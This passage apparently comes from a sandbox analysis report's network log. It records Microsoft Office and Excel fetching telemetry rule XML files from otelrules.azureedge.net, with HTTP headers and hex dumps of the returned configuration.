2024-10-30 02:46:54 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


Session IDSource IPSource PortDestination IPDestination Port
120192.168.2.44987513.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:54 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:54 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:54 GMT
Content-Type: text/xml
Content-Length: 1362
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
ETag: "0x8DC582BDC13EFEF"
x-ms-request-id: 4bda3d21-a01e-0053-54ed-288603000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024654Z-15b8d89586fwzdd8urmg0p1ebs0000000k30000000006eau
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:54 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
121192.168.2.44987613.107.246.454437268C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
TimestampBytes transferredDirectionData
2024-10-30 02:46:54 UTC207OUTGET /rules/rule120603v8s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:54 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:54 GMT
Content-Type: text/xml
Content-Length: 2128
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
ETag: "0x8DC582BA41F3C62"
x-ms-request-id: 84a1d713-001e-00a2-4ba7-26d4d5000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024654Z-15b8d89586fdmfsg1u7xrpfws00000000bng00000000a61q
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:54 UTC2128INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 33 22 20 56 3d 22 38 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 64 64 69 74 69 6f 6e 61 6c 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 45 3d 22 66 61 6c 73 65 22 20 44 4c 3d
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120603" V="8" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAdditional" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" E="false" DL=


Session IDSource IPSource PortDestination IPDestination Port
122192.168.2.44987713.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:54 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:54 UTC584INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:54 GMT
Content-Type: text/xml
Content-Length: 1425
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
ETag: "0x8DC582BE6BD89A1"
x-ms-request-id: 9a40e34d-b01e-005c-559c-274c66000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024654Z-16849878b7828dsgct3vrzta7000000005x00000000046bh
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:54 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


Session IDSource IPSource PortDestination IPDestination Port
123192.168.2.44987913.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:54 UTC192OUTGET /rules/rule702501v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:54 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:54 GMT
Content-Type: text/xml
Content-Length: 1415
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
ETag: "0x8DC582BE7C66E85"
x-ms-request-id: 6afd71f5-301e-003f-7d9e-26266f000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024654Z-16849878b7867ttgfbpnfxt44s00000007c0000000002mad
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:54 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


Session IDSource IPSource PortDestination IPDestination Port
124192.168.2.44987813.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:54 UTC192OUTGET /rules/rule703400v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:54 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:54 GMT
Content-Type: text/xml
Content-Length: 1388
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
ETag: "0x8DC582BDBD9126E"
x-ms-request-id: e02f31dd-001e-0082-0849-275880000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024654Z-16849878b78bjkl8dpep89pbgg000000064g00000000b94h
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:54 UTC1388INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


Session IDSource IPSource PortDestination IPDestination Port
125192.168.2.44988013.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:55 UTC192OUTGET /rules/rule702500v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:55 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:55 GMT
Content-Type: text/xml
Content-Length: 1378
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
ETag: "0x8DC582BDB813B3F"
x-ms-request-id: c032846d-701e-005c-2d58-27bb94000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024655Z-16849878b78smng4k6nq15r6s40000000900000000004ppy
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:55 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


Session IDSource IPSource PortDestination IPDestination Port
126192.168.2.44988113.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:55 UTC192OUTGET /rules/rule700501v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:55 UTC584INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:55 GMT
Content-Type: text/xml
Content-Length: 1405
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
ETag: "0x8DC582BE89A8F82"
x-ms-request-id: 622dd3a6-e01e-0003-140d-260fa8000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024655Z-16849878b78fhxrnedubv5byks00000005r000000000ez9y
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:55 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


Session IDSource IPSource PortDestination IPDestination Port
127192.168.2.44988213.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:55 UTC192OUTGET /rules/rule700500v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:55 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:55 GMT
Content-Type: text/xml
Content-Length: 1368
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
ETag: "0x8DC582BE51CE7B3"
x-ms-request-id: 48a66efd-001e-00a2-625d-26d4d5000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024655Z-r197bdfb6b4c8q4qvwwy2byzsw00000007rg00000000ade8
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:55 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=


Session IDSource IPSource PortDestination IPDestination Port
128192.168.2.44988313.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:55 UTC192OUTGET /rules/rule702551v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:55 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:55 GMT
Content-Type: text/xml
Content-Length: 1415
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
ETag: "0x8DC582BDCE9703A"
x-ms-request-id: 63860650-101e-00a2-42b4-279f2e000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024655Z-16849878b78z2wx67pvzz63kdg000000060000000000fm2q
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:55 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


Session IDSource IPSource PortDestination IPDestination Port
129192.168.2.44988413.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:55 UTC192OUTGET /rules/rule702550v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:55 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:55 GMT
Content-Type: text/xml
Content-Length: 1378
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
ETag: "0x8DC582BE584C214"
x-ms-request-id: c49cf7be-b01e-0002-3880-271b8f000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024655Z-16849878b786lft2mu9uftf3y400000008sg0000000021a0
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:55 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />


Session IDSource IPSource PortDestination IPDestination Port
130192.168.2.44988513.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:56 UTC192OUTGET /rules/rule701351v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:56 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:56 GMT
Content-Type: text/xml
Content-Length: 1407
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
ETag: "0x8DC582BE687B46A"
x-ms-request-id: de5eab8c-501e-0029-0b23-2ad0b8000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024656Z-r197bdfb6b48pcqqxhenwd2uz8000000089000000000adhf
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:56 UTC1407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
